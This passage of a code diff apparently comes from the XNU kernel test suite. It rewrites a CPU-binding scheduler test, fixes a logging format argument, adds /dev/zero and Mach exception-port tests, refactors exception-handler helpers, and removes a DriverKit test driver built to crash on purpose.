&ncpu_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)"); -static void * -spin_fn(__unused void *arg) -{ - T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread"); + T_LOG("hw.ncpu: %2d\n", sysctl_ncpu); - kern_return_t kr; + T_ASSERT_GT(sysctl_ncpu, 0, "at least one CPU exists"); - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + for (uint32_t cpu_to_bind = 0; cpu_to_bind < sysctl_ncpu; cpu_to_bind++) { + int32_t before_csw_count = get_csw_count(); + T_LOG("(csw %4d) attempting to bind to cpu %2d\n", before_csw_count, cpu_to_bind); - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC * 2) + mach_absolute_time(); + uint64_t start = mach_absolute_time(); - /* - * run and sleep a bit to force some scheduler churn to get all the cores active - * needed to work around bugs in the amp scheduler - */ - while (mach_absolute_time() < timeout && g_bail == false) { - usleep(500); + rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &cpu_to_bind, sizeof(cpu_to_bind)); - uint64_t inner_timeout = nanos_to_abs(1 * NSEC_PER_MSEC) + mach_absolute_time(); + uint64_t end = mach_absolute_time(); - while (mach_absolute_time() < inner_timeout && g_bail == false) { - ; + if (rv == -1 && errno == ENOTSUP) { + T_SKIP("Binding is available, but this process doesn't support binding (e.g. Rosetta on Aruba)"); } - } - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", cpu_to_bind); - return NULL; -} + uint32_t os_cpu_number_reported = fixed_os_cpu_number(); + bound_cpu_out = 0; + rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); -#pragma clang diagnostic push -#pragma clang diagnostic ignored "-Wgnu-flexible-array-initializer" -T_DECL(count_cpus, "Tests we can schedule threads on all hw.ncpus cores according to _os_cpu_number", - T_META_CHECK_LEAKS(false), T_META_ENABLED(false)) -#pragma clang diagnostic pop -{ - setvbuf(stdout, NULL, _IONBF, 0); - setvbuf(stderr, NULL, _IONBF, 0); + T_QUIET; T_EXPECT_EQ((int)cpu_to_bind, bound_cpu_out, + "should report bound cpu id matching requested bind target"); - int rv; - kern_return_t kr; - kr = mach_timebase_info(&timebase_info); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info"); - - kr = semaphore_create(mach_task_self(), &g_readysem, SYNC_POLICY_FIFO, 0); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create"); - - kr = semaphore_create(mach_task_self(), &g_go_sem, SYNC_POLICY_FIFO, 0); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create"); - - size_t ncpu_size = sizeof(g_threads); - rv = sysctlbyname("hw.ncpu", &g_threads, &ncpu_size, NULL, 0); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)"); - - printf("hw.ncpu: %2d\n", g_threads); + uint64_t delta_abs = end - start; + uint64_t delta_ns = abs_to_nanos(delta_abs); - assert(g_threads < max_threads); + int32_t after_csw_count = get_csw_count(); - for (uint32_t i = 0; i < g_threads; i++) { - create_thread(&thread_fn, g_thread_pri); - } - - for (uint32_t i = 0; i < g_spin_threads; i++) { - create_thread(&spin_fn, g_spin_threads_pri); - } + T_LOG("(csw %4d) bound to cpu %2d in %f milliseconds\n", + after_csw_count, cpu_to_bind, + ((double)delta_ns / 1000000.0)); - for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) { - kr = semaphore_wait(g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait"); - } + if (cpu_to_bind > 0) { + T_QUIET; T_EXPECT_LT(before_csw_count, after_csw_count, + "should have had to context switch to execute the bind"); + } - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); + T_LOG("cpu %2d reported id %2d\n", + cpu_to_bind, os_cpu_number_reported); - /* spin to warm up CLPC :) */ - while (mach_absolute_time() < timeout) { - ; + T_QUIET; + T_EXPECT_EQ(cpu_to_bind, os_cpu_number_reported, + "should report same CPU number as was bound to"); } - kr = semaphore_signal_all(g_go_sem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_signal_all"); + int unbind = -1; /* pass -1 in order to unbind the thread */ - for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) { - kr = semaphore_wait(g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait"); - } + rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &unbind, sizeof(unbind)); - uint32_t cpus_seen = 0; + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", unbind); - for (uint32_t i = 0; i < g_threads; i++) { - if (g_cpu_seen[i]) { - cpus_seen++; - } + rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0); - printf("cpu %2d: %d\n", i, g_cpu_seen[i]); - } + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); + T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "thread should be unbound at the end"); - T_ASSERT_EQ(cpus_seen, g_threads, "test should have run threads on all CPUS"); + T_PASS("test has run threads on all CPUS"); } diff --git a/tests/data_protection.c b/tests/data_protection.c index bb0411dec..2688bdde4 100644 --- a/tests/data_protection.c +++ b/tests/data_protection.c @@ -1040,7 +1040,7 @@ apple_key_store(uint32_t command, input_struct_count, outputs, output_count, NULL, NULL ); if (io_result != kIOReturnSuccess) { - T_LOG("%s: call to AppleKeyStore method %d failed", __func__); + T_LOG("%s: call to AppleKeyStore method %d failed", __func__, command); goto close; } diff --git a/tests/decompression_failure.c b/tests/decompression_failure.c index 1e753f7f1..6005152eb 100644 --- a/tests/decompression_failure.c +++ b/tests/decompression_failure.c @@ -120,6 +120,8 @@ run_test(vm_address_t buffer_start, vm_address_t buffer_length) static size_t kern_memory_failure_handler( + __unused mach_port_t task, + __unused mach_port_t thread, exception_type_t exception, mach_exception_data_t code) { diff --git a/tests/dev_zero.c b/tests/dev_zero.c new file mode 100644 index 000000000..c35549957 --- /dev/null +++ b/tests/dev_zero.c @@ -0,0 +1,29 @@ +#include +#include +#include +#include +#include + +T_DECL(dev_zero, + "test reading from /dev/zero", + T_META_ASROOT(false)) +{ + int dev = opendev("/dev/zero", O_RDONLY, NULL, NULL); + char buffer[100]; + + for (int i = 0; i < 100; i++) { + buffer[i] = 0xff; + } + + int rd_sz = read(dev, buffer, sizeof(buffer)); + + T_EXPECT_EQ(rd_sz, 100, "read from /dev/zero failed"); + + for (int i = 0; i < 100; i++) { + if (buffer[i]) { + T_FAIL("Unexpected non-zero character read from /dev/zero"); + } + } + + close(dev); +} diff --git a/tests/driverkit/Makefile b/tests/driverkit/Makefile index f58ffbd84..987e08d57 100644 --- a/tests/driverkit/Makefile +++ b/tests/driverkit/Makefile @@ -1,100 +1,11 @@ -PROJECT := xnu/darwintests - ifdef BASEDSTROOT override DSTROOT = $(BASEDSTROOT) endif -INVALID_ARCHS = i386 -ENABLE_LTE_TESTS=YES - -OTHER_LTE_INCLUDE_FILES += \ - /System/Library/PrivateFrameworks/LoggingSupport.framework, \ - /System/Library/PrivateFrameworks/MobileKeyBag.framework, \ - /System/Library/Frameworks/IOSurface.framework, \ - /usr/local/lib/libdarwintest_utils.dylib, \ - /usr/lib/libapple_crypto.dylib, - -DEVELOPER_DIR ?= $(shell xcode-select -p) # the xnu build system will only ever call us with the default target .DEFAULT_GOAL := install -SDKROOT ?= driverkit.internal - -include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.common - -DRIVERKIT_DIR := $(TARGETSDK)/System/DriverKit -DRIVERKIT_TARGET := x86_64-apple-driverkit$(shell xcrun --sdk driverkit.internal --show-sdk-version) - -IIG := $(shell xcrun --sdk "$(SDKROOT)" -f iig) - -# Enumerate all directories in this folder, excluding the "build" directory -DEXT_SRCS = $(filter-out build,$(shell find . -type d -depth 1 | sed -e "s:./::g")) - -# hack: reuse the default CXXFLAGS and LDFLAGS but remove -mmacosx-version-min and -arch. Also adds a few other required flags -# These are used for both iig and clang -DEXT_SHARED_CXXFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(CXXFLAGS) $(OTHER_CXXFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -isystem$(DRIVERKIT_DIR)/usr/include -iframework$(DRIVERKIT_DIR)/System/Library/Frameworks -std=gnu++14 - -# These are used just for clang -DEXT_CXXFLAGS := $(DEXT_SHARED_CXXFLAGS) -target $(DRIVERKIT_TARGET) - -# These are used just for iig -IIGFLAGS := -- $(DEXT_SHARED_CXXFLAGS) -D__IIG=1 -x c++ - -# Used just for clang. LDFLAGS are not needed for iig -DEXT_LDFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(LDFLAGS) $(OTHER_LDFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -target $(DRIVERKIT_TARGET) -L$(DRIVERKIT_DIR)/usr/lib -F$(DRIVERKIT_DIR)/System/Library/Frameworks -framework DriverKit +install: + mkdir -p $(DSTROOT)/AppleInternal -# This generates rules to create dexts from each directory specified in DEXT_SRCS -define GENERATE_DEXT_RULE -## Given the following directory structure: -## test_driver_123/ -## Info.plist -## test_driver_123.entitlements -## [cpp and iig files] -## This produces a dext called com.apple.test_driver_123.dext: -## com.apple.test_driver_123.dext/ -## com.apple.test_driver_123 [dext executable] -## Info.plist -## _CodeSignature/ - -CUSTOM_TARGETS += com.apple.$1.dext - -com.apple.$1.dext : $(patsubst $1/%.cpp,$(OBJROOT)/$1/%.o,$(wildcard $1/*.cpp)) $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig)) - # Create bundle directory - mkdir -p $(SYMROOT)/$$@ - # Link object files - $(CXX) $(DEXT_LDFLAGS) $$^ -o $(SYMROOT)/$$@/com.apple.$1 - # Copy Info.plist and sign - cp $1/Info.plist $(SYMROOT)/$$@ - codesign -vvv --force --sign - --entitlements $1/$1.entitlements --timestamp=none $(SYMROOT)/$$@ - -install-com.apple.$1.dext: com.apple.$1.dext - mkdir -p $(INSTALLDIR) - cp -R $(SYMROOT)/com.apple.$1.dext $(INSTALLDIR) - -$(OBJROOT)/$1/DerivedSources/%.iig.o: $(OBJROOT)/$1/DerivedSources/%.iig.cpp - mkdir -p $(OBJROOT)/$1/DerivedSources - # Compile *.iig.cpp to object file - $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$^ -o $$@ - -$(OBJROOT)/$1/DerivedSources/%.iig.cpp: $1/%.iig - mkdir -p $(OBJROOT)/$1/DerivedSources - # Generate *.iig.cpp and *.h header files from *.iig - $(IIG) --def $$^ --impl $$@ --header $$(patsubst %.iig.cpp,%.h,$$@) $(IIGFLAGS) - -# Tell make not to delete the intermediate *.iig.cpp file since it is useful for debugging -.PRECIOUS :: $(OBJROOT)/$1/DerivedSources/%.iig.cpp - -$(OBJROOT)/$1/%.o: $1/%.cpp $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig)) - # Compile c++ file. The additional dependency is for headers emitted by iig - $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$< -o $$@ -endef - - -ifeq ($(PLATFORM),MacOSX) -$(foreach DEXTSRCDIR,$(DEXT_SRCS),$(eval $(call GENERATE_DEXT_RULE,$(DEXTSRCDIR)))) -else -EXCLUDED_SOURCES += $(DEXT_SRCS) -endif - -include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist b/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist deleted file mode 100644 index d4a53465d..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist +++ /dev/null @@ -1,70 +0,0 @@ - - - - - BuildMachineOSBuild - 19A582a - CFBundleDevelopmentRegion - en - CFBundleExecutable - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleIdentifier - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleInfoDictionaryVersion - 6.0 - CFBundleName - com.apple.test_intentionally_crashing_driver_56101852 - CFBundlePackageType - DEXT - CFBundleShortVersionString - 1.0 - CFBundleSupportedPlatforms - - MacOSX - - CFBundleVersion - 1 - DTCompiler - com.apple.compilers.llvm.clang.1_0 - DTPlatformBuild - 12A5026a - DTPlatformName - macosx - DTPlatformVersion - 10.16 - DTSDKBuild - - DTSDKName - driverkit.macosx20.0 - DTXcode - 1200 - DTXcodeBuild - 12A5026a - IOKitPersonalities - - test_intentionally_crashing_driver_56101852 - - CFBundleIdentifier - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleIdentifierKernel - com.apple.kpi.iokit - IOClass - IOUserService - IOMatchCategory - com.apple.test_intentionally_crashing_driver_56101852 - IOProviderClass - IOUserResources - IOResourceMatch - IOKit - IOUserClass - test_intentionally_crashing_driver_56101852 - IOUserServerName - com.apple.test_intentionally_crashing_driver_56101852 - - - OSBundleUsageDescription - - OSMinimumDriverKitVersion - 20.0 - - diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp deleted file mode 100644 index 96e21dc20..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp +++ /dev/null @@ -1,30 +0,0 @@ -// -// test_intentionally_crashing_driver_56101852.cpp -// test_intentionally_crashing_driver_56101852 -// -// Copyright © 2019 Apple Inc. All rights reserved. -// - -#include - -#include -#include - -#include "test_intentionally_crashing_driver_56101852.h" - -kern_return_t -IMPL(test_intentionally_crashing_driver_56101852, Start) -{ - kern_return_t ret; - ret = Start(provider, SUPERDISPATCH); - os_log(OS_LOG_DEFAULT, "Hello World"); - return ret; -} - -/* Intentionally crash */ -__attribute__((constructor)) void -crash() -{ - /* cause SIGILL */ - __builtin_trap(); -} diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements deleted file mode 100644 index a34733c79..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements +++ /dev/null @@ -1,10 +0,0 @@ - - - - - com.apple.developer.driverkit - - com.apple.security.app-sandbox - - - diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig deleted file mode 100644 index 1ebf4fbe8..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig +++ /dev/null @@ -1,21 +0,0 @@ -// -// test_intentionally_crashing_driver_56101852.iig -// test_intentionally_crashing_driver_56101852 -// -// Copyright © 2019 Apple Inc. All rights reserved. -// - -#ifndef test_intentionally_crashing_driver_56101852_h -#define test_intentionally_crashing_driver_56101852_h - -#include -#include - -class test_intentionally_crashing_driver_56101852: public IOService -{ -public: - virtual kern_return_t - Start(IOService * provider) override; -}; - -#endif /* test_intentionally_crashing_driver_56101852_h */ diff --git a/tests/drop_priv.c b/tests/drop_priv.c index 13d4681af..f91df015f 100644 --- a/tests/drop_priv.c +++ b/tests/drop_priv.c @@ -14,6 +14,8 @@ #include #endif +#include "drop_priv.h" + #if TARGET_OS_OSX #define INVOKER_UID "SUDO_UID" #define INVOKER_GID "SUDO_GID" @@ -40,8 +42,6 @@ _get_sudo_invoker(const char *var) } #endif /* TARGET_OS_OSX */ -void -drop_priv(void); void drop_priv(void) { diff --git a/tests/drop_priv.h b/tests/drop_priv.h new file mode 100644 index 000000000..864da8369 --- /dev/null +++ b/tests/drop_priv.h @@ -0,0 +1,6 @@ +#ifndef __DROP_PRIV_H +#define __DROP_PRIV_H + +void drop_priv(void); + +#endif /* __DROP_PRIV_H */ diff --git a/tests/exc_helpers.c b/tests/exc_helpers.c index 6084fef4b..83567dcf1 100644 --- a/tests/exc_helpers.c +++ b/tests/exc_helpers.c @@ -105,14 +105,36 @@ catch_mach_exception_raise( __builtin_unreachable(); } +/** + * This has to be defined for linking purposes, but it's unused. + */ +kern_return_t +catch_mach_exception_raise_state( + mach_port_t exception_port, + exception_type_t type, + exception_data_t codes, + mach_msg_type_number_t code_count, + int *flavor, + thread_state_t in_state, + mach_msg_type_number_t in_state_count, + thread_state_t out_state, + mach_msg_type_number_t *out_state_count) +{ +#pragma unused(exception_port, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count) + T_FAIL("Triggered catch_mach_exception_raise_state() which shouldn't happen..."); + __builtin_unreachable(); +} + /** * Called by mach_exc_server() to handle the exception. This will call the * test's exception-handler callback and will then modify * the thread state to move to the next instruction. */ kern_return_t -catch_mach_exception_raise_state( +catch_mach_exception_raise_state_identity( mach_port_t exception_port __unused, + mach_port_t thread, + mach_port_t task, exception_type_t type, exception_data_t codes, mach_msg_type_number_t code_count, @@ -138,7 +160,7 @@ catch_mach_exception_raise_state( T_ASSERT_EQ(*flavor, EXCEPTION_THREAD_STATE, "The thread state flavor is EXCEPTION_THREAD_STATE"); T_ASSERT_EQ(in_state_count, EXCEPTION_THREAD_STATE_COUNT, "The thread state count is EXCEPTION_THREAD_STATE_COUNT"); - size_t advance_pc = exc_handler_callback(type, codes_64); + size_t advance_pc = exc_handler_callback(task, thread, type, codes_64); /** * Increment the PC by the requested amount so the thread doesn't cause @@ -155,6 +177,7 @@ catch_mach_exception_raise_state( pc = ptrauth_sign_unauthenticated(pc, ptrauth_key_function_pointer, 0); arm_thread_state64_set_pc_fptr(*state, pc); #else + (void)advance_pc; T_FAIL("catch_mach_exception_raise_state() not fully implemented on this architecture"); __builtin_unreachable(); #endif @@ -163,28 +186,6 @@ catch_mach_exception_raise_state( return KERN_SUCCESS; } -/** - * This has to be defined for linking purposes, but it's unused. - */ -kern_return_t -catch_mach_exception_raise_state_identity( - mach_port_t exception_port, - mach_port_t thread, - mach_port_t task, - exception_type_t type, - exception_data_t codes, - mach_msg_type_number_t code_count, - int *flavor, - thread_state_t in_state, - mach_msg_type_number_t in_state_count, - thread_state_t out_state, - mach_msg_type_number_t *out_state_count) -{ -#pragma unused(exception_port, thread, task, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count) - T_FAIL("Triggered catch_mach_exception_raise_state_identity() which shouldn't happen..."); - __builtin_unreachable(); -} - mach_port_t create_exception_port(exception_mask_t exception_mask) { @@ -209,7 +210,7 @@ create_exception_port(exception_mask_t exception_mask) thread, exception_mask, exc_port, - (exception_behavior_t)(EXCEPTION_STATE | MACH_EXCEPTION_CODES), + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), EXCEPTION_THREAD_STATE); T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); diff --git a/tests/exc_helpers.h b/tests/exc_helpers.h index 2ac27c8ad..60237d5da 100644 --- a/tests/exc_helpers.h +++ b/tests/exc_helpers.h @@ -37,14 +37,17 @@ * Callback invoked by run_exception_handler() when a Mach exception is * received. * - * @param type exception type received from the kernel - * @param codes exception codes received from the kernel + * @param task the task causing the exception + * @param thread the task causing the exception + * @param type exception type received from the kernel + * @param codes exception codes received from the kernel * * @return how much the exception handler should advance the program * counter, in bytes (in order to move past the code causing the * exception) */ -typedef size_t (*exc_handler_callback_t)(exception_type_t type, mach_exception_data_t codes); +typedef size_t (*exc_handler_callback_t)(mach_port_t task, mach_port_t thread, + exception_type_t type, mach_exception_data_t codes); mach_port_t create_exception_port(exception_mask_t exception_mask); diff --git a/tests/exception_ports_info.c b/tests/exception_ports_info.c new file mode 100644 index 000000000..e27ba5643 --- /dev/null +++ b/tests/exception_ports_info.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +T_DECL(exception_ports_info, "Test {task, thread}_get_exception_ports_info") +{ + kern_return_t kr; + mach_port_t exc_port1, exc_port2, exc_port3; + + mach_msg_type_number_t count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + + mach_msg_type_number_t count2 = EXC_TYPES_COUNT; + exception_mask_t masks2[EXC_TYPES_COUNT]; + mach_port_t ports[EXC_TYPES_COUNT]; + exception_behavior_t behaviors2[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors2[EXC_TYPES_COUNT]; + + unsigned int exc_port1_kotype = 0, exc_port1_kaddr = 0; + unsigned int exc_port2_kotype = 0, exc_port2_kaddr = 0; + unsigned int kotype = 0, kobject = 0, exc_port3_kotype = 0, exc_port3_kaddr = 0; + boolean_t found_exc_port1 = false; + boolean_t found_exc_port2 = false; + boolean_t found_exc_port3 = false; + + ipc_info_space_t info_space; + ipc_info_name_array_t table; + ipc_info_tree_name_array_t tree; + mach_msg_type_number_t tblcnt = 0, treecnt = 0; + + /* Create the mach port the exception messages will be sent to. */ + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port2); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port3); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + + /* + * Insert a send right into the exception port that the kernel will use to + * send the exception thread the exception messages. + */ + kr = mach_port_insert_right(mach_task_self(), exc_port1, exc_port1, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + kr = mach_port_insert_right(mach_task_self(), exc_port2, exc_port2, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + kr = mach_port_insert_right(mach_task_self(), exc_port3, exc_port3, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + + T_LOG("exc_port1: 0x%x", exc_port1); + T_LOG("exc_port2: 0x%x", exc_port2); + T_LOG("exc_port3: 0x%x", exc_port3); + + /* Tell the kernel what port to send exceptions to. */ + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_GUARD, + exc_port1, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_RPC_ALERT, /* why can't be EXC_CRASH or EXC_MASK_CORPSE_NOTIFY ? */ + exc_port2, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, + exc_port3, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + /* now, get exception ports info */ + kr = thread_get_exception_ports(mach_thread_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2); + T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports(): 0x%x", kr); + T_EXPECT_EQ(count2, 0, "should have 0 exception ports"); + + kr = thread_get_exception_ports_info(mach_thread_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info(): 0x%x", kr); + T_EXPECT_EQ(count, 0, "should have 0 exception ports"); + + count = EXC_TYPES_COUNT; + count2 = EXC_TYPES_COUNT; + + kr = task_get_exception_ports_info(mach_task_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info(): 0x%x", kr); + T_EXPECT_EQ(count, 4, "should have 4 masks"); /* Returns 3 if one exc_port registers for EXC_CRASH */ + + /* get exception ports */ + kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2); + T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports(): 0x%x", kr); + + for (int i = 0; i < count2; i++) { + T_LOG("exception port name: 0x%x", ports[i]); + } + T_EXPECT_EQ(count, count2, "should return same mask count"); + + kr = memcmp(masks, masks2, count * sizeof(exception_mask_t)); + T_EXPECT_EQ(kr, 0, "masks should be the same"); + + kr = memcmp(behaviors, behaviors2, count * sizeof(exception_behavior_t)); + T_EXPECT_EQ(kr, 0, "behaviors should be the same"); + + kr = memcmp(flavors, flavors, count * sizeof(thread_state_flavor_t)); + T_EXPECT_EQ(kr, 0, "flavors should be the same"); + + kr = mach_port_kernel_object(mach_task_self(), mach_task_self(), &kotype, &kobject); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_kernel_object(): 0x%x", kr); + T_LOG("task_self kobject: 0x%x", kobject); + + T_QUIET; T_EXPECT_MACH_SUCCESS(mach_port_space_info(mach_task_self(), &info_space, &table, + &tblcnt, &tree, &treecnt), "mach_port_space_info(): 0x%x", kr); + + for (int i = 0; i < tblcnt; i++) { + if (table[i].iin_name == exc_port1) { + exc_port1_kaddr = table[i].iin_object; + } + if (table[i].iin_name == exc_port2) { + exc_port2_kaddr = table[i].iin_object; + } + if (table[i].iin_name == exc_port3) { + exc_port3_kaddr = table[i].iin_object; + } + } + + T_LOG("exc_port_1_kaddr: 0x%x", exc_port1_kaddr); + T_LOG("exc_port_2_kaddr: 0x%x", exc_port2_kaddr); + T_LOG("exc_port_3_kaddr: 0x%x", exc_port3_kaddr); + + for (int i = 0; i < count; i++) { + T_LOG("ports_info[%d].iip_port_object: 0x%x", i, ports_info[i].iip_port_object); + + if (ports_info[i].iip_port_object == exc_port1_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_GUARD, "check if mask for exc_port1 is correct"); + found_exc_port1 = true; + } + if (ports_info[i].iip_port_object == exc_port2_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_RPC_ALERT, "check if mask for exc_port2 is correct"); + found_exc_port2 = true; + } + if (ports_info[i].iip_port_object == exc_port3_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, "check if mask for exc_port3 is correct"); + found_exc_port3 = true; + } + } + + T_EXPECT_TRUE(found_exc_port1, "should find exc_port1"); + T_EXPECT_TRUE(found_exc_port2, "should find exc_port2"); + T_EXPECT_TRUE(found_exc_port3, "should find exc_port3"); +} diff --git a/tests/exception_tests.c b/tests/exception_tests.c new file mode 100644 index 000000000..37517e7f8 --- /dev/null +++ b/tests/exception_tests.c @@ -0,0 +1,51 @@ +#include +#include +#include +#include "exc_helpers.h" + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +static size_t +exc_immovable_handler( + mach_port_t task, + mach_port_t thread, + __unused exception_type_t type, + __unused mach_exception_data_t codes) +{ + T_EXPECT_EQ(task, mach_task_self(), "Received immovable task port"); + T_EXPECT_EQ(thread, pthread_mach_thread_np(pthread_main_thread_np()), + "Received immovable thread port"); + T_END; +} + +T_DECL(exc_immovable, "Test that exceptions receive immovable ports") +{ + mach_port_t exc_port = create_exception_port(EXC_MASK_BAD_ACCESS); + uint32_t opts = 0; + size_t size = sizeof(&opts); + mach_port_t mp; + kern_return_t kr; + + T_LOG("Check if 